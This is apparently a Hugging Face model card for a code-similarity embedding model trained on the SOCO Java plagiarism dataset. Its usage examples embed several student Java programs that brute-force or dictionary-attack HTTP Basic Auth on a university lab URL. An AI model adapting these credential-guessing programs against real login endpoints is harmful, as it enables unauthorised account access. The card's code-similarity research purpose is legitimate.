buelfhood/SOCO_TRAIN_java
Viewer • Updated • 76.5k • 71
How to use buelfhood/SOCO-Java-UnixCoder-Softmax-PairClass-VAST-NoEval with sentence-transformers:
from sentence_transformers import SentenceTransformer
model = SentenceTransformer("buelfhood/SOCO-Java-UnixCoder-Softmax-PairClass-VAST-NoEval")
sentences = [
"\n\nimport java.awt.*;\nimport java.String;\nimport java.util.*;\nimport java.io.*;\nimport java.net.*;\n\n\n\npublic class BruteForce\n{\n private URL url;\n private HttpURLConnection connection ;\n private int stopTime = 0;\n private int startTime = 0;\n private int count = 0;\n\n public BruteForce()\n {\n System.out.println(\"Process is running...\");\n startTime = System.currentTimeMillis();\n threeLetters();\n twoLetters();\n }\n\n public static void main (String args[])\n {\n BruteForce bf = new BruteForce();\n }\n \n public void threeLetters()\n {\n String s1;\n char [] a = {'a','a','a'};\n\n for (int i0 = 0; i0 < 26; i0++)\n {\n for (int i1 = 0; i1 < 26; i1++)\n {\n for (int i2 = 0; i2 < 26; i2++)\n {\n s1 = String.valueOf((char)(a[0] + i0)) + String.valueOf((char)(a[1] + i1)) +\n\t\t String.valueOf((char)(a[2] + i2));\n decision(s1);\n count++;\n\n s1 = String.valueOf((char)(a[0] + i0)) + String.valueOf((char)(a[1] + i1)) +\n (String.valueOf((char)(a[2] + i2))).toUpperCase();\n decision(s1);\n count++;\n\n s1 = String.valueOf((char)(a[0] + i0)) + (String.valueOf((char)(a[1] + i1))).toUpperCase() +\n (String.valueOf((char)(a[2] + i2))).toUpperCase();\n decision(s1);\n count++;\n\n s1 = (String.valueOf((char)(a[0] + i0))).toUpperCase() +\n (String.valueOf((char)(a[1] + i1))).toUpperCase() +\n (String.valueOf((char)(a[2] + i2))).toUpperCase();\n decision(s1);\n count++;\n\n s1 = (String.valueOf((char)(a[0] + i0))) + (String.valueOf((char)(a[1] + i1))).toUpperCase() +\n String.valueOf((char)(a[2] + i2));\n decision(s1);\n count++;\n\n s1 = (String.valueOf((char)(a[0] + i0))).toUpperCase() + String.valueOf((char)(a[1] + i1)) +\n\t\t String.valueOf((char)(a[2] + i2));\n decision(s1);\n count++;\n\n s1 = (String.valueOf((char)(a[0] + i0))).toUpperCase() + String.valueOf((char)(a[1] + i1)) +\n (String.valueOf((char)(a[2] + i2))).toUpperCase();\n decision(s1);\n count++;\n\n s1 = (String.valueOf((char)(a[0] + i0))).toUpperCase() +\n (String.valueOf((char)(a[1] + i1))).toUpperCase() + String.valueOf((char)(a[2] + i2));\n decision(s1);\n count++;\n }\n }\n }\n }\n \n public void twoLetters()\n {\n String s1;\n char [] a = {'a','a'};\n\n for (int i0 = 0; i0 < 26; i0++)\n {\n for (int i1 = 0; i1 < 26; i1++)\n {\n s1 = String.valueOf((char)(a[0] + i0)) + String.valueOf((char)(a[1] + i1));\n decision(s1);\n count++;\n\n s1 = String.valueOf((char)(a[0] + i0)) + String.valueOf((char)(a[1] + i1)).toUpperCase();\n decision(s1);\n count++;\n\n s1 = (String.valueOf((char)(a[0] + i0))).toUpperCase() +\n (String.valueOf((char)(a[1] + i1))).toUpperCase();\n decision(s1);\n count++;\n\n s1 = (String.valueOf((char)(a[0] + i0))).toUpperCase() + String.valueOf((char)(a[1] + i1));\n decision(s1);\n count++;\n }\n }\n }\n\n \n public void decision(String s1)\n {\n if (find(s1) == 200)\n {\n stopTime = System.currentTimeMillis();\n runTime = stopTime - startTime;\n System.out.println(\"***************************************\");\n System.out.println(\"\\nAttack successfully\");\n System.out.println(\"\\nPassword is: \" + s1);\n System.out.println(\"\\nThe contents of the Web site: \");\n displayContent(s1);\n System.out.println(\"\\nTime taken crack: \" + runTime + \" millisecond\");\n System.out.println(\"\\nNumber of attempts: \" + count);\n System.out.println();\n\n System.exit(0);\n }\n }\n \n \n public int find(String s1)\n {\n int responseCode = 0;\n try\n {\n url = new URL(\"http://sec-crack.cs.rmit.edu./SEC/2/\");\n connection = (HttpURLConnection)url.openConnection();\n\n connection.setRequestProperty(\"Authorization\",\" \" + MyBase64.encode(\"\" + \":\" + s1));\n\n responseCode = connection.getResponseCode();\n\n }catch (Exception e)\n {\n System.out.println(e.getMessage());\n }\n return responseCode;\n }\n\n \n public void displayContent(String pw)\n {\n BufferedReader bw = null ;\n try\n {\n url = new URL(\"http://sec-crack.cs.rmit.edu./SEC/2/\");\n connection = (HttpURLConnection)url.openConnection();\n\n connection.setRequestProperty(\"Authorization\",\" \" + MyBase64.encode(\"\" + \":\" + pw));\n InputStream stream = (InputStream)(connection.getContent());\n if (stream != null)\n {\n InputStreamReader reader = new InputStreamReader (stream);\n bw = new BufferedReader (reader);\n String line;\n\n while ((line = bw.readLine()) != null)\n {\n System.out.println(line);\n }\n }\n }\n catch (IOException e)\n {\n System.out.println(e.getMessage());\n }\n }\n}\n\n\n\n\n",
"\nimport java.io.*;\nimport java.net.Socket;\nimport java.util.*;\n\npublic class Email\n{\n private String hello;\n private String mailFrom=\"\";\n private String mailTo=\"\";\n private String mailData=\"\";\n \n private String subject=\"\";\n private String content=\"\";\n private String follows=\"\";\n private String changeContent=\"\";\n private String stop=\"\";\n private String end=\"\";\n private String line=\"\";\n private InputStream is;\n private BufferedReader bf;\n private OutputStream os;\n private PrintWriter pw;\n public Email(Vector change) throws Exception\n {\n hello= \"HELO mail.rmit.edu.\";\n mailFrom = \"MAIL FROM: @cs.rmit.edu.\";\n mailTo = \"RCPT : @cs.rmit.edu.\";\n mailData = \"DATA\";\n subject=\"Subject: Some changes occur\";\n content=\" is some changes the : http://www.cs.rmit.edu./students/\";\n follows=\"The changes as follows:\";\n for(int i=0;i<change.size();i++)\n changeContent+=change.elementAt(i).toString()+\"\\r\\n\";\n stop =\"\\r\\n.\";\n end=\"QUIT\";\n }\n public void send() throws Exception\n {\n Socket sk = new Socket(\"mail.cs.rmit.edu.\",25);\n is= sk.getInputStream();\n os = sk.getOutputStream();\n pw = new PrintWriter(new OutputStreamWriter(os));\n pw.println(hello);\n pw.println(mailFrom);\n pw.println(mailTo);\n pw.println(mailData);\n pw.println();\n pw.println(subject);\n pw.println(content);\n pw.println(follows);\n pw.println(changeContent);\n pw.println(stop);\n pw.println(end);\n pw.flush();\n pw.get();\n \n }\n}",
"\nimport java.awt.*;\nimport java.awt.event.*;\nimport java.io.*;\nimport java.util.*;\nimport java.net.*;\n\npublic class Dictionary\n{\n private String userPassword;\n private static int counter;\n\n\n\n\n\n public Dictionary(String username)\n {\n String user;\n String password;\n counter = 0;\n user = username;\n\n try\n {\n FileReader fr = new FileReader( \"/usr/share/lib/dict/words\" );\n BufferedReader bf = new BufferedReader( fr );\n\n while ((password = bf.readLine()) != null)\n {\n userPassword = user + \":\" + password;\n\n System.out.print(\".\");\n\n if (password.length() == 3)\n if (doEncoding(userPassword)== true)\n {\n System.out.println(password);\n return;\n }\n\n counter++;\n }\n }\n catch ( IOException ioe )\n {\n System.err.println( ioe.toString() );\n }\n }\n\n\n\n\n private boolean doEncoding(String userPassword)\n {\n String encoding = new misc.BASE64Encoder().encode (userPassword.getBytes());\n return doAttempt(encoding);\n }\n\n\n\n\n\n private boolean doAttempt (String encoding)\n {\n\n try\n {\n URL url = new URL (\"http://sec-crack.cs.rmit.edu./SEC/2/\");\n\n URLConnection uc = url.openConnection();\n uc.setDoInput(true);\n uc.setDoOutput(true);\n\n uc.setRequestProperty (\"Get\", \"/SEC/2/ \" + \"HTTP/1.1\");\n uc.setRequestProperty (\"Host\", \"sec-crack.cs.rmit.edu.\");\n uc.setRequestProperty (\"Authorization\", \" \" + encoding);\n\n return uc.getHeaderField(0).trim().equalsIgnoreCase(\"HTTP/1.1 200 OK\");\n }\n catch (MalformedURLException e)\n {\n System.out.println (\"Invalid URL\");\n }\n catch (IOException e)\n {\n System.out.println (e.toString() );\n }\n\n return false;\n }\n\n\n\n\n\n public static void main(String args[])\n {\n Date sdate = new Date();\n System.out.print(\"Starting the Ditionary Attack at:\" + sdate + \"\\n\");\n\n Dictionary bf = new Dictionary(args[0]);\n\n Date edate = new Date();\n System.out.print(\"Ditionary Attack ends at:\" + sdate + \"\\n\");\n System.out.println(\"Time taken by Dictionary is : \" + (edate.getTime() - sdate.getTime())/1000 + \" seconds \\n\");\n System.out.print(\"Attempts in this session:\" + counter + \"\\n\");\n\n }\n}\n\n\n\n\n",
"\n\n\nimport java.text.*; \nimport java.util.*; \nimport java.net.*; \nimport java.io.*; \n\n \npublic class BruteForce { \n\n public int runProcess(String urlString,String passwd) { \n\n int returnval = 0;\n MyAuthenticator auth = new MyAuthenticator(passwd);\n Authenticator.setDefault(auth);\n\n\t System.out.println(\"trying passord: \" + passwd);\n try{\n URL yahoo = new URL(urlString); \n BufferedReader in = new BufferedReader(new InputStreamReader(yahoo.openStream()));\n String inputLine;\n while ((inputLine = in.readLine()) != null) {\n\t System.out.println(inputLine);\n\t System.out.println(\"passord: \" + passwd);\n returnval = 1;\n }\n\t in.close();\n }catch(Exception e){ returnval = 0;}\n return returnval;\n }\n\n public static void main(String argv[]) { \n\n String[] val = \n{\"a\",\"b\",\"c\",\"d\",\"e\",\"f\",\"g\",\"h\",\"i\",\"j\",\"k\",\"l\",\"m\",\"n\",\"o\",\"p\",\"q\",\"r\",\"s\",\"t\",\"u\",\"v\",\"w\",\"x\",\"y\",\"z\",\"A\",\"B\",\"C\",\"D\",\"E\",\"F\",\"G\",\"H\",\"I\",\"J\",\"K\",\"L\",\"M\",\"N\",\"O\",\"P\",\"Q\",\"R\",\"S\",\"T\",\"U\",\"V\",\"W\",\"X\",\"Y\",\"Z\"};\n\n int l1 = 0;\n\n int l2 = 0;\n\n int l3 = 0;\n \n int retval = 0;\n\n String pwd = \"\";\n\n \n BruteForce s = new BruteForce(); \n String urlToSearch = \"http://sec-crack.cs.rmit.edu./SEC/2/\"; \n \n for (int a = 0; a < 52; a++) {\n\n l1 = a;\n\n pwd = val[l1];\n retval = 0;\n retval = s.runProcess(urlToSearch,pwd); \n if (retval > 0) {\n System.exit(0);\n }\n }\n\n\n for (int b = 0; b < 52; b++) {\n l1 = b;\n for (int c = 0; c < 52; c++) {\n\n l2 = c;\n pwd = val[l1]+ val[l2];\n retval = 0;\n retval = s.runProcess(urlToSearch,pwd); \n if (retval > 0) {\n System.exit(0);\n }\n }\n }\n\n\n for (int d = 0; d < 52; d++) {\n l1 = d;\n for (int e = 0; e < 52; e++) {\n l2 = e;\n for (int f = 0; f < 52; f++) {\n\n l3 = f;\n\n pwd = val[l1]+ val[l2]+ val[l3];\n retval = 0;\n retval = s.runProcess(urlToSearch,pwd); \n if (retval > 0) {\n System.exit(0);\n }\n }\n }\n }\n\n } \n} \n\n"
]
embeddings = model.encode(sentences)
similarities = model.similarity(embeddings, embeddings)
print(similarities.shape)
# [4, 4]This is a sentence-transformers model finetuned from microsoft/unixcoder-base-unimodal on the soco_train_java dataset. It maps sentences & paragraphs to a 768-dimensional dense vector space and can be used for semantic textual similarity, semantic search, paraphrase mining, text classification, clustering, and more.
SentenceTransformer(
(0): Transformer({'max_seq_length': 512, 'do_lower_case': False}) with Transformer model: RobertaModel
(1): Pooling({'word_embedding_dimension': 768, 'pooling_mode_cls_token': False, 'pooling_mode_mean_tokens': True, 'pooling_mode_max_tokens': False, 'pooling_mode_mean_sqrt_len_tokens': False, 'pooling_mode_weightedmean_tokens': False, 'pooling_mode_lasttoken': False, 'include_prompt': True})
)
First install the Sentence Transformers library:
pip install -U sentence-transformers
Then you can load this model and run inference.
from sentence_transformers import SentenceTransformer
# Download from the 🤗 Hub
model = SentenceTransformer("buelfhood/SOCO-Java-UnixCoder-Softmax-PairClass-VAST-NoEval")
# Run inference
sentences = [
'\n\nimport java.awt.*;\nimport java.awt.event.*;\nimport java.io.*;\nimport java.net.*;\n\npublic class BruteForce extends Frame implements ActionListener {\n\tprivate TextField tf = new TextField();\n private TextArea ta = new TextArea();\n\n \tpublic void actionPerformed (ActionEvent e) {\n\t\tString s = tf.getText();\n\t\tString login="";\n\n\t\tif (s.length() != 0)\n\t\t{\n\t\t\tchar symbol = \'A\';\n\n\t\t\tlogin=":";\n\t\t\t\n\t\t\tfor(int i = 0; i < 3; i++)\n\t\t\t{\n\t\t\t\tsymbol = (char)(57.0 * Math.random() + 65);\n\n\t\t\t\tif(symbol>90 && symbol<97){\n\t\t\t\t\ti--;\n\t\t\t\t\tcontinue;\n\t\t\t\t}\n\t\t\t\tlogin=login+symbol;\n\n\t\t\t}\n\n\t\t ta.setText (fetchURL (s,login));\n\t\t System.out.println("runing"+login);\n\t\t}while(ta.getText().compareTo("Invalid URL")!=0 || ta.getText().compareTo("Error URL")!=0);\n\n\t\tSystem.out.println("The password is: "+login);\n\t}\n\n\tpublic BruteForce() {\n\t\tsuper ("SEC-CRACK");\n\n\t \n\t add (tf, BorderLayout.LEFT);\n\t ta.setEditable(false);\n\t add (ta, BorderLayout.CENTER);\n\t tf.addActionListener (this);\n\n\t addWindowListener (new WindowAdapter() {\n\t public void windowClosing (WindowEvent e) {\n\t dispose();\n\t System.exit(0);\n\t }\n\t });\n\t}\n\n\tprivate String fetchURL (String urlString,String login) {\n\t\tStringWriter sw = new StringWriter();\n\t PrintWriter pw = new PrintWriter();\n\n\t try {\n\t URL url = new URL (urlString);\n\n\t \n\t\n\t \n\n\t \n\t String encoding = new url.misc.BASE64Encoder().encode (login.getBytes());\n\n\t \n\t URLConnection uc = url.openConnection();\n\t uc.setRequestProperty ("Authorization", " " + encoding);\n\t InputStream content = (InputStream)uc.getInputStream();\n\t BufferedReader in =\n\t new BufferedReader (new InputStreamReader (content));\n\t String line;\n\t while ((line = in.readLine()) != null) {\n\t pw.println (line);\n\t }\n\t } catch (MalformedURLException e) {\n\t pw.println ("Invalid URL");\n\t } catch (IOException e) {\n\t pw.println ("Error URL");\n\t }\n\t return sw.toString();\n\t}\n\n\n\tpublic static void main(String args[]) {\n\t\tFrame f = new BruteForce();\n\t f.setSize(300, 300);\n\t f.setVisible (true);\n\t}\n}\n\n\n\n\nclass Base64Converter\n{\n\tpublic static final char [ ] alphabet = {\n \'A\', \'B\', \'C\', \'D\', \'E\', \'F\', \'G\', \'H\', \n \'I\', \'J\', \'K\', \'L\', \'M\', \'N\', \'O\', \'P\', \n \'Q\', \'R\', \'S\', \'T\', \'U\', \'V\', \'W\', \'X\', \n \'Y\', \'Z\', \'a\', \'b\', \'c\', \'d\', \'e\', \'f\', \n \'g\', \'h\', \'i\', \'j\', \'k\', \'l\', \'m\', \'n\', \n \'o\', \'p\', \'q\', \'r\', \'s\', \'t\', \'u\', \'v\', \n \'w\', \'x\', \'y\', \'z\', \'0\', \'1\', \'2\', \'3\', \n \'4\', \'5\', \'6\', \'7\', \'8\', \'9\', \'+\', \'/\' }; \n\n\n public static String encode ( String s )\n {\n return encode ( s.getBytes ( ) );\n }\n\n public static String encode ( byte [ ] octetString )\n {\n int bits24;\n int bits6;\n\n char [ ] out\n = new char [ ( ( octetString.length - 1 ) / 3 + 1 ) * 4 ];\n\n int outIndex = 0;\n int i = 0;\n\n while ( ( i + 3 ) <= octetString.length )\n {\n \n bits24 = ( octetString [ i++ ] & 0xFF ) << 16;\n bits24 |= ( octetString [ i++ ] & 0xFF ) << 8;\n bits24 |= ( octetString [ i++ ] & 0xFF ) << 0;\n\n bits6 = ( bits24 & 0x00FC0000 ) >> 18;\n out [ outIndex++ ] = alphabet [ bits6 ];\n bits6 = ( bits24 & 0x0003F000 ) >> 12;\n out [ outIndex++ ] = alphabet [ bits6 ];\n bits6 = ( bits24 & 0x00000FC0 ) >> 6;\n out [ outIndex++ ] = alphabet [ bits6 ];\n bits6 = ( bits24 & 0x0000003F );\n out [ outIndex++ ] = alphabet [ bits6 ];\n }\n\n if ( octetString.length - i == 2 )\n {\n \n bits24 = ( octetString [ i ] & 0xFF ) << 16;\n bits24 |= ( octetString [ i + 1 ] & 0xFF ) << 8;\n\n bits6 = ( bits24 & 0x00FC0000 ) >> 18;\n out [ outIndex++ ] = alphabet [ bits6 ];\n bits6 = ( bits24 & 0x0003F000 ) >> 12;\n out [ outIndex++ ] = alphabet [ bits6 ];\n bits6 = ( bits24 & 0x00000FC0 ) >> 6;\n out [ outIndex++ ] = alphabet [ bits6 ];\n\n \n out [ outIndex++ ] = \'=\';\n }\n else if ( octetString.length - i == 1 )\n {\n \n bits24 = ( octetString [ i ] & 0xFF ) << 16;\n\n bits6 = ( bits24 & 0x00FC0000 ) >> 18;\n out [ outIndex++ ] = alphabet [ bits6 ];\n bits6 = ( bits24 & 0x0003F000 ) >> 12;\n out [ outIndex++ ] = alphabet [ bits6 ];\n\n \n out [ outIndex++ ] = \'=\';\n out [ outIndex++ ] = \'=\';\n }\n\n return new String ( out );\n }\n}\n\n',
'\n\nimport java.io.*;\nimport java.text.*;\nimport java.util.*;\nimport java.net.*;\n\npublic class BruteForce extends Thread\n{\n private static final String USERNAME = "";\n private static final char [] POSSIBLE_CHAR =\n {\'a\', \'b\', \'c\', \'d\', \'e\', \'f\', \'g\', \'h\', \'i\', \'j\', \'k\', \'l\', \'m\',\n \'n\', \'o\', \'p\', \'q\', \'r\', \'s\', \'t\', \'u\', \'v\', \'w\', \'x\', \'y\', \'z\',\n \'A\', \'B\', \'C\', \'D\', \'E\', \'F\', \'G\', \'H\', \'I\', \'J\', \'K\', \'L\', \'M\',\n \'N\', \'O\', \'P\', \'Q\', \'R\', \'S\', \'T\', \'U\', \'V\', \'W\', \'X\', \'Y\', \'Z\'};\n private static int NUMBER_OF_THREAD = 500;\n\n private static Date startDate = null;\n private static Date endDate = null;\n\n private String address;\n private String password;\n\n public BruteForce(String address, String password)\n {\n this.address = address;\n this.password = password;\n }\n\n public static void main(String[] args) throws IOException\n {\n if (args.length < 1)\n {\n System.err.println("Invalid usage!");\n System.err.println("Usage: java BruteForce <url>");\n System.exit(1);\n }\n\n try\n {\n brute(args[0], USERNAME);\n }\n catch(Exception e)\n {\n e.printStackTrace();\n System.exit(1);\n }\n }\n\n public static void brute(String address, String user)\n {\n BruteForce [] threads = new BruteForce[NUMBER_OF_THREAD];\n int index = 0;\n\n startDate = new Date();\n for(int i = 0; i < POSSIBLE_CHAR.length; i++)\n {\n for(int j = 0; j < POSSIBLE_CHAR.length; j++)\n {\n for(int k = 0; k < POSSIBLE_CHAR.length; k++)\n {\n String password = ""+POSSIBLE_CHAR[i]+POSSIBLE_CHAR[j]+\n POSSIBLE_CHAR[k];\n\n if (threads[index] != null && threads[index].isAlive())\n {\n try\n {\n threads[index].join();\n }\n catch(InterruptedException e ) {}\n }\n threads[index] = new BruteForce(address, password);\n threads[index].get();\n\n index = (index++) % threads.length;\n }\n }\n }\n }\n\n public void run()\n {\n if (endDate != null)\n return;\n\n try\n {\n\n URLConnection conn = (new URL(address)).openConnection();\n conn.setDoInput(true);\n\n if (login(conn, USERNAME, password))\n {\n endDate = new Date();\n System.out.println("Found the password: \\""+password+"\\"!");\n SimpleDateFormat format = new SimpleDateFormat("dd/MM/yyyy HH:mm:");\n System.out.println("Process started at: "+format.format(startDate));\n System.out.println("Process started at: "+format.format(endDate));\n double timeTaken = (double)(endDate.getTime()-startDate.getTime())/60000;\n System.out.println("Time taken: "+timeTaken+" minutes");\n System.exit(0);\n }\n else\n {\n System.out.println("Password: \\""+password+"\\" Failed!");\n return;\n }\n }\n catch(Exception e)\n {\n e.printStackTrace();\n }\n\n }\n\n public static boolean login(URLConnection conn, String user, String pass)\n {\n try\n {\n String encodeAuth = " "+Base64Encoder.encode(user+":"+pass);\n conn.setRequestProperty ("Authorization", encodeAuth);\n conn.connect();\n conn.getInputStream();\n }\n catch(Exception e)\n {\n return false;\n }\n return true;\n }\n}\n\n\n',
'\n\nimport java.net.*;\nimport java.io.*;\n\npublic class Base64Encoder\n{\n private final static char base64Array [] = {\n \'A\', \'B\', \'C\', \'D\', \'E\', \'F\', \'G\', \'H\',\n \'I\', \'J\', \'K\', \'L\', \'M\', \'N\', \'O\', \'P\',\n \'Q\', \'R\', \'S\', \'T\', \'U\', \'V\', \'W\', \'X\',\n \'Y\', \'Z\', \'a\', \'b\', \'c\', \'d\', \'e\', \'f\',\n \'g\', \'h\', \'i\', \'j\', \'k\', \'l\', \'m\', \'n\',\n \'o\', \'p\', \'q\', \'r\', \'s\', \'t\', \'u\', \'v\',\n \'w\', \'x\', \'y\', \'z\', \'0\', \'1\', \'2\', \'3\',\n \'4\', \'5\', \'6\', \'7\', \'8\', \'9\', \'+\', \'/\'\n };\n\n public static String encode (String string)\n {\n String encodedString = "";\n byte bytes [] = string.getBytes ();\n int i = 0;\n int pad = 0;\n while (i < bytes.length)\n {\n byte b1 = bytes [i++];\n byte b2;\n byte b3;\n if (i >= bytes.length)\n {\n b2 = 0;\n b3 = 0;\n pad = 2;\n }\n else\n {\n b2 = bytes [i++];\n if (i >= bytes.length)\n {\n b3 = 0;\n pad = 1;\n }\n else\n b3 = bytes [i++];\n }\n\n byte c1 = (byte)(b1 >> 2);\n byte c2 = (byte)(((b1 & 0x3) << 4) | (b2 >> 4));\n byte c3 = (byte)(((b2 & 0xf) << 2) | (b3 >> 6));\n byte c4 = (byte)(b3 & 0x3f);\n encodedString += base64Array [c1];\n encodedString += base64Array [c2];\n switch (pad)\n {\n case 0:\n encodedString += base64Array [c3];\n encodedString += base64Array [c4];\n break;\n case 1:\n encodedString += base64Array [c3];\n encodedString += "=";\n break;\n case 2:\n encodedString += "==";\n break;\n }\n }\n return encodedString;\n }\n}\n',
]
embeddings = model.encode(sentences)
print(embeddings.shape)
# [3, 768]
# Get the similarity scores for the embeddings
similarities = model.similarity(embeddings, embeddings)
print(similarities.shape)
# [3, 3]
label, text_1, and text_2| label | text_1 | text_2 | |
|---|---|---|---|
| type | int | string | string |
| details |
|
|
|
| label | text_1 | text_2 |
|---|---|---|
0 |
|
|
0 |
|
|
0 |
|
|
SoftmaxLosslabel, text_1, and text_2| label | text_1 | text_2 | |
|---|---|---|---|
| type | int | string | string |
| details |
|
|
|
| label | text_1 | text_2 |
|---|---|---|
0 |
|
|
0 |
import java.io.; |
|
0 |
|
|
SoftmaxLossper_device_train_batch_size: 16num_train_epochs: 1overwrite_output_dir: Falsedo_predict: Falseeval_strategy: noprediction_loss_only: Trueper_device_train_batch_size: 16per_device_eval_batch_size: 8per_gpu_train_batch_size: Noneper_gpu_eval_batch_size: Nonegradient_accumulation_steps: 1eval_accumulation_steps: Nonetorch_empty_cache_steps: Nonelearning_rate: 5e-05weight_decay: 0.0adam_beta1: 0.9adam_beta2: 0.999adam_epsilon: 1e-08max_grad_norm: 1.0num_train_epochs: 1max_steps: -1lr_scheduler_type: linearlr_scheduler_kwargs: {}warmup_ratio: 0.0warmup_steps: 0log_level: passivelog_level_replica: warninglog_on_each_node: Truelogging_nan_inf_filter: Truesave_safetensors: Truesave_on_each_node: Falsesave_only_model: Falserestore_callback_states_from_checkpoint: Falseno_cuda: Falseuse_cpu: Falseuse_mps_device: Falseseed: 42data_seed: Nonejit_mode_eval: Falseuse_ipex: Falsebf16: Falsefp16: Falsefp16_opt_level: O1half_precision_backend: autobf16_full_eval: Falsefp16_full_eval: Falsetf32: Nonelocal_rank: 0ddp_backend: Nonetpu_num_cores: Nonetpu_metrics_debug: Falsedebug: []dataloader_drop_last: Falsedataloader_num_workers: 0dataloader_prefetch_factor: Nonepast_index: -1disable_tqdm: Falseremove_unused_columns: Truelabel_names: Noneload_best_model_at_end: Falseignore_data_skip: Falsefsdp: []fsdp_min_num_params: 0fsdp_config: {'min_num_params': 0, 'xla': False, 'xla_fsdp_v2': False, 'xla_fsdp_grad_ckpt': False}fsdp_transformer_layer_cls_to_wrap: Noneaccelerator_config: {'split_batches': False, 'dispatch_batches': None, 'even_batches': True, 'use_seedable_sampler': True, 'non_blocking': False, 'gradient_accumulation_kwargs': None}deepspeed: Nonelabel_smoothing_factor: 0.0optim: adamw_torchoptim_args: Noneadafactor: Falsegroup_by_length: Falselength_column_name: lengthddp_find_unused_parameters: Noneddp_bucket_cap_mb: Noneddp_broadcast_buffers: Falsedataloader_pin_memory: Truedataloader_persistent_workers: Falseskip_memory_metrics: Trueuse_legacy_prediction_loop: Falsepush_to_hub: Falseresume_from_checkpoint: Nonehub_model_id: Nonehub_strategy: every_savehub_private_repo: Nonehub_always_push: Falsegradient_checkpointing: Falsegradient_checkpointing_kwargs: Noneinclude_inputs_for_metrics: Falseinclude_for_metrics: []eval_do_concat_batches: Truefp16_backend: autopush_to_hub_model_id: Nonepush_to_hub_organization: Nonemp_parameters: auto_find_batch_size: Falsefull_determinism: Falsetorchdynamo: Noneray_scope: lastddp_timeout: 1800torch_compile: Falsetorch_compile_backend: Nonetorch_compile_mode: Noneinclude_tokens_per_second: Falseinclude_num_input_tokens_seen: Falseneftune_noise_alpha: Noneoptim_target_modules: Nonebatch_eval_metrics: Falseeval_on_start: Falseuse_liger_kernel: Falseeval_use_gather_object: Falseaverage_tokens_across_devices: Falseprompts: Nonebatch_sampler: batch_samplermulti_dataset_batch_sampler: proportional| Epoch | Step | Training Loss |
|---|---|---|
| 0.2393 | 500 | 0.0179 |
| 0.4787 | 1000 | 0.0231 |
| 0.7180 | 1500 | 0.0166 |
| 0.9574 | 2000 | 0.0149 |
@inproceedings{reimers-2019-sentence-bert,
title = "Sentence-BERT: Sentence Embeddings using Siamese BERT-Networks",
author = "Reimers, Nils and Gurevych, Iryna",
booktitle = "Proceedings of the 2019 Conference on Empirical Methods in Natural Language Processing",
month = "11",
year = "2019",
publisher = "Association for Computational Linguistics",
url = "https://arxiv.org/abs/1908.10084",
}
Base model
microsoft/unixcoder-base-unimodal